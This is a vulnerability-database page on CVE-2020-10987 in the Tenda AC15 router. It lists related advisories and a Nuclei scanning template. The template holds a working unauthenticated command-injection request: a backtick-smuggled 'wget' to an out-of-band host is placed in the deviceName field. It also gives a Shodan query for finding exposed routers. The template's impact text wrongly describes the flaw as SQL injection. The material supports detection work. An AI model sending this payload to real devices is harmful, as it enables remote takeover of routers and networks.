| Reporter | Title | Published | Views | Family All 25 |
|---|---|---|---|---|
| Exploit for OS Command Injection in Tenda Ac15_Firmware | 23 Oct 202515:30 | – | githubexploit | |
| CVE-2020-10987 | 13 Jul 202000:00 | – | attackerkb | |
| The vulnerability of the Tenda AC15 AC1900 router’s microprogramming software lies in the insufficient neutralization of special elements transmitted in URIs, allowing a hacker to execute arbitrary commands on the target system. | 22 Oct 202000:00 | – | bdu_fstec | |
| CVE-2020-10987 | 5 Oct 202009:50 | – | circl | |
| Tenda AC1900 Router AC15 Model Remote Code Execution Vulnerability | 3 Nov 202100:00 | – | cisa_kev | |
| Tenda AC15 AC1900 Remote Code Execution Vulnerability | 14 Jul 202000:00 | – | cnvd | |
| Tenda Routers Command Injection (CVE-2020-10987; CVE-2018-14558) | 14 Oct 202000:00 | – | checkpoint_advisories | |
| CVE-2020-10987 | 13 Jul 202018:46 | – | cve | |
| CVE-2020-10987 | 13 Jul 202018:46 | – | cvelist | |
| Microsoft research uncovers new Zerobot capabilities | 21 Dec 202220:00 | – | mmpc |
id: CVE-2020-10987
info:
name: Tenda AC15 AC1900 version 15.03.05.19 - Command Injection
author: pussycat0x
severity: critical
description: |
The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15.03.05.19 allows remote attackers to execute arbitrary system commands via the deviceName POST parameter.
impact: |
Unauthenticated attackers can execute arbitrary SQL commands to access or modify database contents, potentially compromising the entire Tenda router and network configuration.
remediation: |
Upgrade to a patched firmware version or replace the affected device.
reference:
- https://blog.securityevaluators.com/tenda-ac1900-vulnerabilities-discovered-and-exploited-e8e26aa0bc68
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-10987
cwe-id: CWE-78
epss-score: 0.79673
epss-percentile: 0.9956
cpe: cpe:2.3:o:tenda:ac15_firmware:15.03.05.19:*:*:*:*:*:*:*
metadata:
shodan-query: http.title:"tenda wifi"
max-request: 2
vendor: tenda
product: ac15_firmware
tags: cve,cve2020,tenda,rce,kev,unauth,vkev,vuln
variables:
payload: "wget http://{{interactsh-url}}"
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: dsl
dsl:
- 'contains(body,"<title>Tenda WiFi")'
- "contains(content_type, 'text/html')"
- "status_code == 200"
condition: and
internal: true
- raw:
- |
POST /goform/setUsbUnload HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Accept: */*
deviceName=test`;{{payload}};`
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
# digest: 4a0a00473045022100f0482fd10ded11aa860f1c717547212b839b5da7273e1d464ad96c6ae35e435e022075e14bdbe2ba1f92a8d104baa159de8c77fc50fcb7df6bd53022379c05636a37:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation